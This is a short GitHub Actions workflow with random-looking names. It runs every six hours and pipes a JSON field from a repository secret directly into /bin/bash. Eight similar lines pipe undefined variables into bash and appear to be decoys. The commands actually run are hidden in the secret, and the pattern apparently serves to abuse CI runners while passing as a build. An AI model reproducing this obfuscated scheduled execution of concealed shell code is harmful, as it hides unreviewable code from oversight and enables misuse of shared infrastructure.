name: mingquanshu2121

on:
  workflow_dispatch:
  schedule:
    - cron: '47 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: mingquanshu2121
        env:
          x4: ${{ secrets.x4 }}
        run: |
          echo $x4 | jq -r .vkhdq4378 | /bin/bash
          echo $qn06 | jq -r .vpbu812 | /bin/bash
          echo $ojb7 | jq -r .gvyer5 | /bin/bash
          echo $ro49178 | jq -r .su0163 | /bin/bash
          echo $p1047 | jq -r .inn4067 | /bin/bash
          echo $dkl3 | jq -r .np1050 | /bin/bash
          echo $i71241 | jq -r .xn621 | /bin/bash
          echo $ty9437 | jq -r .pjwas02307 | /bin/bash
          echo $xlxhx7900 | jq -r .qo2790 | /bin/bash

